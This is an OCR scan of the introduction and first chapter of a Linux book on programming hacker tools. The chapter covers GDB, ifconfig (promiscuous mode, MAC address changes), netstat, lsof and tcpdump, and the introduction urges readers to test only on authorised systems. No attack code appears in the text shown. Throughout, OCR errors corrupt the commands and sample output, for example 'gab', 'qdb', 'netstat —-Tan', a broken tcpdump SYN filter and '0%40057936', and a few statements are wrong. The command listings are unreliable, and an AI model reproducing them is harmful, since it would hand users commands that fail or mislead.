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Introduction 


It is believed that a real hacker must create all necessary tools independently. If this opinion is to 
be accepted as a postulate, this book is intended to make you a real hacker. This, however, was 
not my goal in writing it. | wrote this book primarily for myself, to gain better understanding of 
how all types of hacker tools are functioning and how they are programmed. By teaching others, 
we enhance our existing familiarity with the subject and acquire new knowledge. I did not cover 
all subjects in the book, but the information presented should be enough to allow you to handle 
the omitted questions on your own. 

Some may accuse me of teaching unethical and even illegal skills. My response is that the 
purpose behind this book is not to teach or advocate any type of destruction but to simply 
describe the technology available. How this technology is used is up to your moral standards. 
Even though I give working program examples in the book, all of them are practically useless 
against properly protected systems. Nevertheless, I want to give you the following instruction 
on using the programs considered in this book: 

Test all examples shown in the book only on your own system or hosts, on which you 
are expressly allowed to do this. Otherwise, you can create problems for those who work on 
the systems that you experiment on. 

Although all program examples are fully operational, they are written for training pur- 
poses; to make the main concept stand out and the code easy to understand, I kept them 
as simple as possible. Naturally, all source codes authored by myself are provided under the 
general public license provision. 

Even though some sticklers for details draw a clear-cut dividing line between hackers and 
crackers, in the book, I use both terms interchangeably to mean the latter type of the com- 
puter aficionado. Frankly, I don’t care about the big-endian versus little-endian (in the sense 
other than byte order) squabbles concerning these terms, and | decided to simply use the term 
“hacker” as the media use it. Nevertheless, | view a hacker primarily as someone who uses 
intelligence and creative powers to develop programs solely to expand the horizons of per- 
sonal knowledge and a cracker as someone who often uses other people’s developments for 
personal gain or for inflicting damage on others. 

The program examples given in the book were developed for x86 platforms running under 
Linux. When possible, I tested programs for operability on two systems: Mandriva 2006 Power 
Pack (the 2.6.12 kernel version) and Linux Red Hat (the 2.4.2 kernel version). 

Each chapter addresses a specific subject matter, so you don’t have to read them in order 
like a textbook. 


2 Introduction 


Prerequisites for Understanding 
the Book's Material 


For you to derive satisfaction and benefit from the book, you must already have certain 
knowledge. The following is a list of the subject areas you must have some knowledge of, 
in order of increasing difficulty, and corresponding suggested sources where such knowledge 
can be obtained: 


J 


You must be able to use Linux at least on the level of a regular user. That is, you must be 
able to use Linux terminal and know basic terminal commands, such as 1s, ps, who, man, 
cat, su, cp, rm, grep, kill, and the like. You must know the organization of the Linux file 
system and the access privilege system. You must be able to create and delete users. 
You must know how to use one of the Linux editors, for example, vi. You must be able to 
configure the network and Internet connection. In general, you must know enough to 
work confidently with Linux. To this end, I advise that you acquire a thick Linux book for 
beginners (such books are numerous nowadays) and read it from beginning to end, in the 
process practicing your newly-acquired knowledge on some Linux system. 

Because most applications considered in this book are network applications, you must 
have a clear idea of basic local and wide-area computer network principles. This means 
you must know what network topologies exist and the differences among them, the open 
system interconnection (OSI) model layers, the TCP/IP protocol stack, the operation of 
the main network protocols, the Ethernet standard, and the operating principles of differ- 
ent communication devices, such as hubs, switches, and routers. | can recommend one 
book |1] as one of the sources for this information. 

Almost all programs in the book are written in C; therefore, you must have good working 
knowledge of this programming language. | can recommend a great C textbook, written 
by the creators of the language themselves [2]. 

Just having good knowledge of the C language is not enough to understand all code in this 
book. You must be able to program in C specifically for Linux: You must know all the fine 
points of this operating system as applied to programming, know what standard Linux li- 
braries and functions are available and how to use them, and so on. In this respect, | can 
recommend two great books. The first one is for beginners [3], and the second one is for 
deeper study [4]. Advanced Linux Programming [4] can be downloaded as separate PDF 
files from http://www.advancedlinuxprogramming.com. 

As already mentioned, most code in this book deals with network applications; therefore, 
you must know how to program network applications in a Linux environment. More spe- 
cifically, you should know how to use such fundamental network functions as socket (), 
bind(), connect(}), listen(), inet aton(), htons(), sendto(), recvfrom(), 
setsockopt (), and select(); such structures as sockaddr in and sockaddr 11; and 
many other standard network programming elements. I assume that even if you don't 
have any practical network programming experience then at least you have read some 
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good books on the subject and have a good theoretical grasp of it. Otherwise, I strongly 
recommend that you study a classical work [5]. 


These prerequisites are far from all the knowledge you will need to understand such an 
all-embracing book like this. For example, the material in some chapters requires you to know 
programming in assembler language or programming for loadable kernel modules. Don't 
worry: In the course of the book, I give the necessary elementary information and sources, 
from which more detailed information can be obtained. 


The "Programming Hacker Tools Uncovered" Series 


This book is just the first in the “Programming Hacker Tools Uncovered” series. The next one 
will be Programming Windows Hacker Tools, which considers implementing the same software 
but for Windows. Don’t miss it! 


Contact 


You can get in touch with me by writing to one of these email addresses: 
sklyaroff@sklyaroff.ru, sklyaroff@mail.ru, or sklyarov@real.xakep.ru. 
You can also visit my personal Web site: www.sklyaroff.ru or www.sklyaroff.com. 







PART I: 
HACKER SOFTWARE 
DEVELOPER'S TOOLKIT 








Chapter 1: Main Tools 





Just like a locksmith, a programmer should have specialized tools. A locksmith could use just 
a file and a hammer for all his work, but a good lathe, a set of proper cutting bits, and a few 
other professional tools would allow him to do his job much faster, more efficiently, and with 
better quality. The same holds true for developing nonstandard hacker software: Specialized 
tools are a must for a proper job. So it is not by accident that I start the book with this chapter. 
Before you can start on your hacker adventures, you have to collect the proper tools and learn 
how to use them. This chapter is intended to help you with this task by providing information 
about the main standard utilities, those included in any complete Linux distribution. These 
tools are usually sufficient to solve the gamut of major programming problems. This informa- 
tion is expanded in Chapter 2, which gives a review of additional utilities that can be used to 
solve highly specialized problems. 

You will not, however, find in these chapters any information about such basic utilities 
as ps, who, man, and gcc. If you don’t know how to use these utilities, you are in well over 
your head with this book. Set it back on a shelf and read the literature suggested in the intro- 
duction first. 

I selected only the most important utilities for this book, those I used myself when 
developing programs for it. 

The only nonstandard software tool I would like to recommend is the VMware virtual 
machine. This a truly unique program that every hacker must have. You can purchase this 
virtual machine for Linux or Windows at the developer's site (http://www.vmware.com). 
A free demo version is also available. At first I wanted to devote a separate chapter to VMware, 
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but I changed my mind because to do this program justice requires devoting a book to it. 
VMware is quite easy to use, but to use its full capabilities you must have network administra- 
tor skills. Because | have such skills, it was easy for me to spread on my computer a small local 
Ethernet network, on which most network programs for this book were developed. 


1.1. GNU Debugger 


GNU Debugger (GDB) is a standard console debugger for Linux and other UNIX-like systems. 
Although there are graphical interfaces for GDB, for example, the Data Display Debugger, 
I will not consider them because they are not standard Linux tools and are not popular in the 
UNIX world. 

There are three types of objects, called targets, that can be debugged using GDB: executa- 
ble files, memory dumps (core files), and processes. A core file contains an image of a memory 
process, usually produced as a result of an abnormal termination of a process. There are vari- 
ous ways to load each of these targets into GDB for debugging. First, any target can be loaded 
from the command line when starting GDB, The following are the main ways of doing this: 


O Loading an executable file into GDB: 


® gab program name 
# qdb -exec program name 


# gdb -e program_name 
C Loading a memory dump file into GDB: 


# gdb -core core name 
f gdb -c core name 
# gdb program name core name 


In the last line, the first argument must be the name of the program that generated 
the core file specified in the second argument. 
© Loading a process file into GDB: 
# gdb -c process pid 


# gdb process name process pid 


The process identifier (PID) of any process can be determined using the ps command. 
Any type of target can also be loaded into the already-started GDB. 
Loading an executable file: 


(gdb) file program name 
(gdb) exec-file program name 


O Loading a dump file: 

(qdb) core-file core name 
© Loading a process: 

(gdb) attach process pid 
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A process can be unloaded from GDB using the detach command. A detached process 
continues executing in the system, and another process can be attached. 

When GDB is started, it outputs rather voluminous copyright information, which can be 
suppressed by invoking GDB with the -q option. 

To make the debugging process more convenient and efficient, you should compile your 
programs to contain debugging information. This can be done by compiling them in GCC 
(GNU C and C++ compiler) with the -g option set. Debugging information will allow you to 
display variable and function names, line numbers, and other identifiers in GDB just as they 
appeared in the program’s source code, If no debugging information is available, GDB will 
work with the program at the assembler command level. 

When debugging a program, you must set a breakpoint in it. There are three types 
of breakpoints: 


O Regular breakpoints. With this type of breakpoint, the program stops when the execution 
comes to a certain address or function. Breakpoints are set using the break command or 
its short form: b.' For example, the following command sets a breakpoint at the main () 
function: 

{qdb) break main 

A breakpoint can also be set at any address; in this case, the address must be preceded 
with an asterisk (*). You may need to set a breakpoint to certain addresses in those parts 
of your program, for which there is no debugging information or source codes. For ex- 
ample, the following command sets a breakpoint at the 0x801b7000 address: 

(gdb) b *0x801b7000 

[J Watchpoints. The program stops when a certain variable is read or changed. There are dif- 
ferent types of watchpoints, each of which is set using a different command. The watch 
command (wa for short) sets a watchpoint that will stop the program when the value of 
the specified variable changes: 

{qdb) wa variable 

The rwatch command (rw for short) sets a watchpoint that will stop the program 
when the value of the specified variable is read: 

{qdb) rw variable 

The awatch command (aw for short) sets a watchpoint that will stop the program 
when the value of the specified variable is read or written: 

(qdb) aw variable 

(J) Catchpoints. The program stops when a certain event takes place, for example, a signal is 
received. A catchpoint is set using the catch command as follows: 


(gdb) catch event 


1 All main GDB commands have a long and a short form. 
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The program will stop when the specified event takes place. The following are some of the 
events that a catchpoint can be set for: 

throw — A C++ exception takes place. 

catch — A C++ exception is intercepted. 

exec — The exec () function is called. 

fork — The fork() function is called. 

vfork — The vfork () function is called. 

Information about catchpoint events can be obtained by executing the help catch com- 
mand. Unfortunately, many events are not supported in GDB. 

Information about all set breakpoints can be obtained by executing the info breakpoints 
command (i b for short). A breakpoint can be disabled using the disable command: 

(gdb) disable Bb point number 

A disabled breakpoint can be activated using the enable command: 

(qdob) enable b point_number 

The number of a breakpoint, as well as its status (enabled or disabled), can be learned us- 
ing the info breakpoints command. 

A breakpoint can be deleted using the delete command: 

(gdb) delete breakpoint point number 

Alternatively, the short command version can be used: 

(gdb) d b point number 

Executing the d command without arguments deletes all breakpoints. 

When all preparations for debugging the program are completed, including setting break- 
points, it can be launched using the run command (r for short). The program will execute 
until it reaches a breakpoint. Execution of a stopped program can be resumed using the 
continue command (or c for short). You can trace program execution by stepping through its 
source code lines using one of the tracing commands. The step N (s N for short) command 
executes N code lines with tracing into a function call, and the next N (nN for short) command 
executes N code lines without tracing into a function call. If N is not specified, a single line of 
code is executed. The stepi N (si N) and nexti N (ni N) command also trace program execu- 
tion, but they work not with source code lines but with machine instructions. 
The finish (fin) command executes the program until the current function is exited. 

The print (p) command is used to output a value of an explicitly-specified expression 
(e.g., p 2+3), a variable value (e.g., pmy var), register contents (e.g., p Seax), or memory cell 
contents (e.g., p *0x8018305). The x command is used to view contents of memory cells. 
The command ’s format is as follows: 


x/Nfu address 


Consider the elements of this command: 


O address — The address, from which to start displaying the memory (no asterisk is neces- 
sary before the address). 
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[) w— The number of memory units (1) to display; the default value is 1. 

O ¢— The output format. Can be one of the following: s, a null-terminated string; i, a ma- 
chine instruction; or x, hexadecimal format (the default rae 

 u— The memory unit. Can be one of the following: b, a byte; h, 2 bytes; w, 4 bytes (i.e., 
a word; the default memory unit); g, 8 bytes (i.e., a double a 


For example, the following command will output 20 hexadecimal words starting from 
address 0x40057936: 
(gdb) x/20xw 0%40057936 


When the detault Nfu values are used, the slash atter the command is not needed. 

The set command is used to modify the contents of registers or memory cells. For exam- 
ple, the following command writes 1 to the ebx register. 

set $Sebx = 1 


The info registers (i r) command displays the contents of all registers. To view the 
contents of only certain registers, they must be specified immediately following the command. 
For example, the following command will display the contents of the ebp and eip registers: 

(gdb) 1 r ebp eip 


The info share command displays information about the currently loaded shared libraries. 
The info frame, info args, and info local commands display the contents of the current stack 
frame, the function’s arguments, and the local variables, respectively. The backtrace (bt) com- 
mand displays the stack frame for each active subroutine. The debugger is exited by entering the 
quit (q) command. Detailed information about a command can be obtained by executing the 
help (h) command followed by the name of the command, for which information ts being sought. 


1.2. lfconfig 


The ifconfig utility is used to configure network interfaces by changing such parameters as 
the Internet protocol (IP) address, the network mask, and the media access control (MAC) 
address. For programmers, the main usefulness of this utility is in the information it provides 
when executed with the -a switch. The following is an example of such output: 


# ifconfig -a 

ethoO Link encap:Ethernet HWaddr O00:0C:29:DE: /A:BC 
inet addr:192.168.10.130 Beast:192.168.10.255 Mask:255.255.255.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:1443845 errors:0 dropped:0 overruns:0 frame:0 
TX packets:3419238 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen: 100 
Interrupt:10 Base address:0x10a4 


lo Link encap: Local Loopback 
inet addr:l27.0.0.1 Mask:255.0.0.0 
UP LOOPBACK RUNNING MTU:16436 Meéetric:1 
RX packets:1447064 errors:0 dropped:0 overruns:0 frame:0 
TX packets:1447064 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 
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The information about the etho Ethernet interface is output first, followed by the infor- 
mation about the 1o loopback interface. Executing ifconfig without any parameters will not 
show the interfaces disabled with the down option (see the corresponding description later). 

Some of the most important pieces of information output by the ifconfig -a command 
are the following: the interface’s IP address (inet addr), the broadcast address (Bcast), the 
mask address (Mask), the MAC address (HWaddr), and the maximum transmission unit (MTU) 
in bytes. Of interest also are the number of successfully received, transmitted, error, dropped, 
and repeated packets (RX packets, TX packets, errors, dropped, and overruns, respectfully). 
The collisions label shows the number of collisions in the network, and the txqueuelen 
label shows the transmission queue length for the device. The Interrupt label shows the 
hardware interrupt number used by the device. 

To output data for only a specific interface, the command is executed specifying the inter- 
face's name: 

# ifconfig etho 


The maximum transmission unit (MTU) of packets for an interface is set using the 
mtu N option: 
# ifconfig ethO mtu 1000 


The ifconfig utility will not let you specify an MTU larger than the maximum allowable 
value, which is 1,500 bytes for Ethernet. The -arp option (with a minus sign) disables the ad- 
dress resolution protocol (ARP) for the specified interface, and the arp option (without a mi- 
nus sign) enables it: 

# ifconfig ethO -arp 

# ifconfig ethd 

etho Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC 

inet addr:192.168.10.130 Beast:192.168.10.255 Mask:255.255.255.0 
UP BROADCAST RUNNING NOARP MULTICAST MTU:1500 Metric:1 


The promise option (without a minus sign) enables the promiscuous mode for the inter- 
face, in which it will accept all packets sent to the network. This mode is usually used by sniffers 
(see Chapter 9). The -promisc option (with a minus sign) disables the promiscuous mode: 

# ifconfig eth promisc 

# ifconfig eth0 

ethO Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC 

inet addr:192.168.10.130 Bcast:192.168.10.255 Mask:255.255.255.0 
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1 


An IP address is assigned to an interface using the inet option; a mask is assigned using 
the netmask option: 


f ifconfig ethO inet 200.168.10.15 netmask 255.255.255.192 

# ifconfig eth0 

ethO Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC 
inet addr:2700.168.10.15 Beast:200.168.10.255 Mask:255.255.255.192 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
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An interface can be disabled using the down option and enabled using the up option: 


# ifconfig ethO down 
# ifconfig ethO up 


The hw class address option is used to change the hardware address (MAC address) of 
an interface if the device's driver supports this capability. The device class name and the MAC 
address string must be specified after the hw keyword. Currently, the ether (Ethernet), ax25 
(AMPR AX.25), and ARCnet and netrom (AMPR NET/ROM) device classes are supported. 
Before the hardware address can be changed, the interface must be disabled (see the down op- 
tion). The following is an example of changing the MAC address of the et ho interface: 

# ifconfig ethO down 

# ifconfig ethO hw ether 13:13:13:13:13:13 

# ifconfig ethO up 

# ifconfig eth 

etho Link encap:Ethernet HWaddr 13:13:13:13:13:13 

inet addr:192.168.10.130 Beast:192.168.10.255 Mask:255.255.255.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 


Using the ifconfig utility, an interface can be assigned multiple alias IP addresses, which, 
however, must pertain to the same network segment as the base address. The following is an 
example of assigning three IP addresses to a single interface, named eth0: 

# ifconfig ethO:0 192.168.10.200 

*# ifconfig ethO:1 192.168.10.201 

# ifconfig ethO:2 192.168.10.202 

# ifconfig -a 

etho Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC 

inet addr:192.168.10.130 Beast:192.168.10.255 Mask:255.255.255.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:1469698 errors:0 dropped:0 overruns:0 frame:0 

TX packets:3440721 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:100 

Interrupt:10 Base address:O0x1l0a4 


ethO:0 Lank encap:Ethernet HWaddr 00:0C:29:DE:7A:BC 
inet addr:192.168.10.200 Beast:192.168.10.255 Mask:255.255.255.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
Interrupt:10 Base address:0xl0a4 


eth0O:1 Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC 
inet addr:192.168.10.201 Beast:192.168.10.255 Mask:255.255.255.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
Interrupt:10 Base address:0x10a4 


ethO:2 Link encap:Ethernet HWaddr 00:0C:29:DE:7A:BC 
inet addr:192.168.10.202 Bcast:192.168.10.255 Mask:255.255.255.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
Interrupt:10 Base address:0x10a4 


ff + 
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Now the interface can be accessed using any of the four IP addresses it was assigned: 
192.168.10.130, 192.168.10.200, 192.168.10.201, or 192.168.10.202. This capability is 
often used by administrators for creating virtual IP address—based Web nodes. An alias ad- 
dress can be deleted using the down parameter as follows: 

f ifconfig eth0:1 down 


1.3. Netstat 


The netstat utility outputs different information about the network operation. If called 
without any parameters, it outputs information about established connections and supple- 
mentary information about internal queues and files used for process interaction. By default, 
listening ports are not included in the output. Both listening and nonlistening ports are dis- 
playing using the -a parameter: 

# netstat -a 

Active Internet connections (servers and established) 


Prote Recv-0 Send-@ Local Address Foreign Address State 

tep 0 O *:1024 lh LISTEN 

tcp 0 0 *:sunrpc it He LISTEN 

tcp 0 0 *: ftp a LISTEN 

bop 0 0 *:ssh “2? LISTEN 

tcp 0 0 *:teinet ae LISTEN 

hep 0 0 localhost.localdom:smtp *:* LISTEN 

rcp 6) 0 192.168.10.130:ssh 192.168.10.128: 39806 ESTABLISHED 
udp 0 0 *:1024 sa ta 

udp 0 0 *:686 ie 

udp 0 QO *:sunrpc => 

Active UNIX domain sockets (servers and established) 

Proto RefCnt Flags Type state I-Node Path 

unix 2 [ acc ] STREAM LISTENING 1581 /dev/qpmetl 

unix 2 [ acc ] STREAM LISTENING 939 /Var/run/pump. sock 
unix 13 [ ] GRAM 1178 /dev/log 

unix 2 { ACC ] STREAM LISTENING 1617 ftmp/.font-unix/fs7100 
unix 2 { ] DGRAM 690847 

unix 2 [ ] DORAM 252658 

unix 2 [ ] DGRAM 12241 

unix 2 [ ] DGORAM 1673 

unix 2 [ ] DGRAM 1620 

unix 2 [ ] DGRAM L584 

unix 2 [ ] DGRAM 1556 

unix 2 [ ] DGRAM 1439 

unix 2 [ ] DGRAM 1413 

unix 2 [ ] DGRAM 1223 

unix 2 i J DGRAM 1187 

unix 2 [ ] STREAM CONNECTED 730 


When domain name system (DNS) support is disabled, net stat unsuccessfully tries to resolve 
numerical addresses to host names and outputs information to the screen with large delays. Adding 
the n flag prevents netstat from trying to resolve host names, thus speeding up the output: 

# netstat -an 
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In this case, all addresses are displayed in a numerical format. 

As you can see in the preceding example, the information output by the netstat utility is 
divided into two parts. The first part, named “active Internet connections,” lists all established 
connections and listening ports. The Proto column shows the protocol — transmission control 
protocol (TCP) or user data protocol (UDP) — used by a connection or service. The Recv-Q and 
Send-Q columns show the number of bytes in the socket read and write buffers, respectively. 
The Local Address and Foreign Address columns show the local and remote addresses. Local 
addresses and ports are usually denoted as an asterisk; if the -n parameter is specified, the local ad- 
dress is shown as 0.0.0.0. Addresses are shown in the computer_name (ip_address) :service 
format, where service is a port number or the name of a standard service. (The mapping of 
port numbers to service names is shown in the /etc/services file.') The State column shows the 
connection’s state. The most common states are ESTABLISHED (active connections), LISTEN 
(ports or services listening for connection requests; not shown when the -a option is used), 
and TIME WAIT (connections being closed). 

Connection states are shown only for TCP, because UDP does not check connection status. 

Thus, the example output shows that most of the ports at the local node are listening and 
only one active secure shell (SSH) input connection is established with a remote address: 
192.168.100.128: 359806. 

The second part of the output, “active UNIX domain sockets,” shows the internal queues 
and files used in the process interaction. 

Using the -t option will output only the TCP ports: 

* netstat —-Tan 

Active Internet connections (servers and established) 


Proto Recv-Q Send-Q Local Address Foreign Address State 

tep 0 0 0.0.0.0:102 0.0.0,0:* LISTEN 

tcp Q OD Pee. Os tid 20.00.08" LISTEN 

tcp 0 0 0.0.0 00221 O20. 0.02% LISTEN 

tcp 0 0 0.0.0.0:22 0.0.0.0;* LISTEN 

tep fe) 0 0.0.0.0:23 0,0.0,07% LISTEN 

tcp 0 0 127.6.0.1:25 0.0.0.0:% LISTEN 

tcp 0 0 192.168.10.130:22 192.168.10.128:58291 ESTABLISHED 


Similarly, the -u parameter is used to output only the UDP ports: 


# netstat -uan 
Active Internet connections (servers and established) 


Proto Recv-Q Send-0 Local Address Foreign Address State 
udp 0 0 0.0.0.0:1024 0.0.0.0:* 
udp 0 0 G.0.0.0:686 0.0.0.0:* 
udp 0 0 0.0.0.0:111 0.0.0.0:* 


The -i parameter is used to output information about the network interfaces: 


# netstat -i 
Kernel Interface table 
Iface MTU Met RX-OK RX-ERR RX-DRP RX-OVR TA-OR TH-ERR TA-DRP TA-OVR Flog 


‘In some UNIX versions, not a colon but a period is used to separate the port number (service name) 
from the computer name (IP address). 
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eth0 1500 QO 1428232 0 a) O 3418346 0 0 0 BMRU 
lo 16436 0 1446930 0 0 O 1446930 0 0 0 LRU 


In many respects, this information is the same as the information produced by executing 
the ifconfig -a command. Columns starting with Rx (received) show the number of successful, 
error, and repeat received packets. Columns starting with Tx (transmitted) show the number 
of successful, error, and repeat sent packets. 


The netstat utility can be used for real-time monitoring of network interfaces. Running 
it with the -c parameter displays statistics at 1-second intervals: 
# netstat -1 -c 


This mode can be used to trace sources of network errors. 
Running netstat with the -s parameter displays operation statistics for different network 
protocols: 
# netstat -s 
Ip: 
2669242 total packets received 
2 with invalid headers 
0 forwarded 
37 incoming packets discarded 
1489607 incoming packets delivered 
4865030 requests sent out 
38 fragments dropped after timeout 
174870 reassemblies required 
B7357 packets reassembled ok 
38 packet reassembles failed 
193194 fragments created 
Temp: 
478041 ICMP messages received 
915 input ICMP message failed. 
ICMP input histogram: 
destination unreachable: 9559 
timeout in transit: 74 
echo requests: 177230 
echo replies: 291178 
177978 ICMP messages sent 
0 ICMP messages failed 


fo 


The -r parameter outputs the kernel routing table: 


# netstat -r 
Kernel IP routing table 


Destination Gateway Genmask Flags MSS Window irtt Iface 
192.168.10.0 * 255.295.255.0 U 40 0 O etho 
127.0.0.0 a 255.0.0.0 U 40 0 0 le 


The -p parameter outputs information about processes associated with specific ports: 

# netstat -anp 

Active Internet connections (servers and established) 

Proto Recv-@Q Send-@ Local Address Foreign Address State PID/Program name 
tcp 0 0 0.0.0.0:1024 i Be BP! fs LISTEN 510/rpc.statd 
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 495/portmap 
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tcp 0 0.0 0.0221 0.0.00: * LISTEN 742/xinetd 

tcp ) O05 0 ese 0.0.0.0: LISTEN T22/sshd 

tcp ) Osos os3 OU .0 204 LISTEN 742/xinetd 

tcp 0 QO 127.0.0.1:25 0.0.0.03% LISTEN 782/sendmail: accep 
tcp 0 0. 192:..166.10.130:22 192.168.10.128:39806 ESTABLISHED 99899/sshd 
udp 0 0 0.0.0.0:1024 0.0.0,0:4 510/rpe.statd 
udp 0 0 0.0.0.0:686 10. 0.02% 510/rp¢c.statd 
udp 0 0 192.168.10.130:1129 192.168.10.1:53 ESTABLISHED 10058/tcpdump 
udp 0 0°0;0.0.07111 0:0.0,.03% 495 /portmap 
Active UNIX domain sockets (servers and established) 

Proto RefCnt Flags Type state I-Node PID/Proegram name Path 

unix 2 [ ACC ] STREAM LISTENING 1581 795,//qpm /dev/gpmctl 

unix 2 [ ACC ] STREAM LISTENING 939 415/pump /Var/run/pump.sock 

unix 13 [j DGRAM 1178 476/syslogd fdev/loag 

unix 2 [ ACC ] STREAM LISTENING 1617 B53/xfs /tmp/.font-unix/fs7100 
unix 2 [ ] DGRAM 690847 B80/login -- root 

unix 2 [ ] DGRAM 252658 742/xinetd 

unix 2 [ ] DGRAM 12241 §879/login -- root 

unix 2 [ ] DGORAM 1673 B78/legin -- root 

unix 2 | DORAM 1620 853/xfs 

unix 7? [.] DGRAM 1584 807 /crond 

unix 2 [oJ DGRAM 1556 782/sendmail: accep 

unik 2 [J DGRAM 1439 695/automount 

unix 2 [ ] DGRAM 1413 646/apmd 

unix 2 [ ] DGRAM 12273 510/rpe.statd 

unix 2 Bev DGRAM 1187 461/klogd 

unix 2 [ ] STREAM CONNECTED 730 L/init [3] 


Compared with the output produced by the -a parameter, the -p parameter adds another 
column to the output, named PID/Program name, in which the PID and the service name are 
shown. Because it does not fit into a single line, the column is carried over to the next line. 
The netstat utility used in some UNIX versions does not have the -p parameter. In this case, 
the function of this parameter is performed by the 1sof utility. 


1.4. Lsof 


The isof utility is included with most of the modern Linux distributions. If you 
don’t have it in your system, you can download it from this _ site: 
ftp://vic.cc.purdue.edu/pub/tools/unix/Isof. 

The name lsof is a contraction for “list open files,” accordingly, when run without pa- 
rameters, it lists all open files, folders, libraries, UNIX streams, and open ports and the proc- 
esses that opened them. But when run with the -i parameter, it only lists open ports and the 
processes that opened them. The following is an example of such output: 


# lsof -i 

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME 

portmap 495 root 3u IPv4 1211 UDP *:sunrpc 

portmap 495 root 4u IPv4 1212 TCP *:sunrpc (LISTEN) 


rpc.statd 510 reot 4u IPyv4 1232 UDP *:686 
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roc.statd 510 reot 5u IP v4 1241 UDP *:1024 

rpe.statd 510 root 6u IPv4 1244 TCP *:1024 (LISTEN) 

sshd 722 root 3u IPw4 1482 TCP *:ssh (LISTEN) 

xinetd 742 root 3u IPw4 1509 TCP *:ftp (LISTEN) 

xinetd 742 root 4u IPv4 1$10 TCP *;telnet (LISTEN) 

sendmail 782 root 4u IPv4 1557 TCP localhost.localdomain:smtp (LISTEN) 


This information shows that the file transfer protocol (FTP) and telnet services are 
launched using the xinetd superserver and, for example, the simple mail transfer protocol 
(SMTP) service is launched using the sendmail service and, thus, cannot be disabled by editing 
the /etc/xinetd.conf configuration file. 

The utility can also output information for a specific service only: 


if lsof -i TCP:ftp 
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME 
xinetd 742 root 3u IP w4 L509 TCP *:ftp (LISTEN) 


1.5. Tcpdump 


The tcpdump utility is a network packet analyzer developed by the Lawrence Berkeley National 
Laboratory. The official page for this utility is http://www.tcpdump.org. When [ was develop- 
ing network examples for this book, the tcpdump utility in my system practically never shut 
down. 


1.5.1. Command Line Options 


If tcpdump is run without any parameters, it intercepts all network packets and displays their 
header information. The -i parameter is used to specify the network interface whose data are 
to be obtained: 

& tcpdump -i ethz 

To show only the packets received or sent by a specific host, the host’s name or IP address 
must be specified after the host keyword: 

=» tcpdump host namesrv 

Packets exchanged, for example, between the nameservi and the nameserv2 hosts can be 
displayed using the following filter: 

# tcpdump host namesrvl and host namesrvz 

They can also be displayed using a short version of it: 

# tcpdump host namesrvl and namesrv2 

Only the outgoing packets from a certain node can be traced by running the utility with 
the src host keywords: 


' tcpdump src host namesrv 


Incoming packets only can be traced using the dst host keywords: 
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# tcpdump dst host namesrv 

The sre port and dst port keywords are used to trace the source port and the destination 
port, respectively: 

# tcpdump dst port 513 

To trace only one of the three protocols — TCP, UDP, or Internet control message proto- 
col (ICMP) — its name is simply specified in the command line. Filters of any degree of com- 
plexity can be constructed using the Boolean operators and (4s), or (||), and not (1). 
The following is an example of a filter that traces only [CMP packets arriving from an external 
network: 

# tcpdump icmp and not sre net localnet 

Specific bits or bytes in protocol headers can be tested using the following format: 
prote[expr:size]. Here, proto specifies one of the following protocols: ether, FDDI, TR, IP, 
ARP, RARP, TCP, UDP, ICMP, or IP6. The expr field specifies the offset in bytes from the 
start of the packet’s header, and size is an auxiliary field specifying the number of bytes to 
examine (if omitted, only 1 byte is tested). For example, the following filter will select only 
TCP segments with the SYN flag set: 

# tcpdump 'tcp[ 13 )J==2' 

Concerning this filter, byte 13 of the TCP header contains 8 flag bits, of which syn is the 
second in order (see Section 3.4.4), Because this bit must be set to 1, the contents of the flag 
byte in the binary form will be 00000010 (or 2 in the decimal base). The -c parameter can be 
used to specify the number of packets to receive. For example, only 10 bytes will be received 
by executing the following command: 

# tcpdump -c 10 

The -a parameter instructs the utility to attempt to convert IP addresses to names (at the 
expense of the execution speed): 

# tcpdump —-a 

The -v (verbose), -vv (very verbose), and -vvv (very, very verbose) options produce pro- 
gressively extended outputs. 


1.5.2. Format of tcpdump Output 


Each line of a tcpdump listing starts with the hh:mm:ss. frac time stamp of the current time, 
where frac is fractions of a second. The time stamp can be followed by the interface (e.g., 
eth0O, ethl, or lo) used to receive or send packets. The transmission direction is indicated us- 
ing the < or > characters. For example, eth0< means that the ethO interface is receiving pack- 
ets. Accordingly, eth0O> means that eth interface is sending packets onto the network. The 
following information depends on the type of the packet: ARP/RARP, TCP, UDP, NBP, ATP, 
and so on. The following are the formats for some of the main packet types. 
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1.5.2.1. TCP Packets 


Src.port > dst.port: flags data-seqno ack window urgent options 


Here, src. port and dst. port are the source and the destination IP address and port. 

The Flags field specifies set TCP header flags. It can be a combination of the 8 (SYN), 
F (FIN), P (PUSH), and R (RST) characters. A period in this field means that there are no set flags. 

The data-seqno field describes the packet’s data in the first:last(nbytes) format. 
Here first and last are the sequence numbers of the packet's first and last bytes, respec- 
tively, and nbytes is the number of data bytes in the packet. If nbytes is 0, the first and last 
parameters are the same. 

The Ack parameter specifies the next number in the sequence (ISN + 1). 

The Window parameter specifies the window size. 

The Urgent parameter means that the packet contains urgent data (the URG flag). 

The Options parameter specifies additional information, for example, <mss 1024> (the 
segment s Maximum size). 


1.5.2.2. UDP Packets 
Src. Port > dst.port: udp nbytes 


The Udp marker specifies a UDP packet. 
The Nbytes field indicates the number of bytes in the UDP packet. 


1.5.2.3. ICMP Packets 
Src > dst: icmp: type 

The Icmp marker specifies an ICMP packet. 

The Type field indicates the type of the ICMP message, for example, echo request 
Orecho reply. 


Chapter 2: More Tools 





The utilities described in this chapter are not used by programmers that often, but in some 
